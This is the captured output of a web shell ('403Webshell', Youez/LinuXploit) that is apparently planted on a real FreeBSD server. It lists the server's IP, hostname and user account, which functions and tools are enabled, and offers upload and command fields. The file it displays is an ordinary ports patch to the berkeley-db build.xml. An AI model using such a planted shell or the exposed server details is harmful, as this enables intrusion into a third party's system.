403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/java/berkeley-db/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/java/berkeley-db/files/patch-junit
--- build.xml	2014-12-17 02:30:51 UTC
+++ build.xml	2015-05-12 12:14:56 -0400
@@ -132,6 +132,9 @@
     </path>
 
+    <property environment="env"/>
     <path id="unittest.classpath">
       <path refid="class.path"/>
+      <pathelement location="${env.JAVALIBDIR}/junit.jar"/>
+      <pathelement location="${env.JAVALIBDIR}/hamcrest.jar"/>
       <pathelement location="${unittest.destdir}"/>
       <pathelement path="${junit.jarfile}"/>
@@ -872,5 +875,5 @@
     </target>
 
-    <target name="compile-unittest" depends="compile-src, get-junit-jar">
+    <target name="compile-unittest" depends="compile-src">
       <ant antfile="ant/compile.xml" dir="." inheritall="false">
         <property name="srcdir" value="${unittest.srcdir}"/>
@@ -917,4 +920,5 @@
           <property name="destdir" value="${unittest.testserialdir}"/>
           <reference refid="class.path" torefid="compile.classpath"/>
+          <reference refid="unittest.classpath" torefid="compile.classpath"/>
       </ant>
 
@@ -2127,5 +2131,4 @@
       <mkdir dir="${installdir}"/>
       <mkdir dir="${installdir}/docs"/>
-      <mkdir dir="${installdir}/bin"/>
       <mkdir dir="${installdir}/lib"/>
       <copy todir="${installdir}/docs">
@@ -2137,7 +2140,4 @@
 	 <fileset dir="lib"/>
       </copy>
-      <copy todir="${installdir}/bin">
-	 <fileset dir="bin"/>
-      </copy>
     </target>
 

Youez - 2016 - github.com/yon3zu
LinuXploit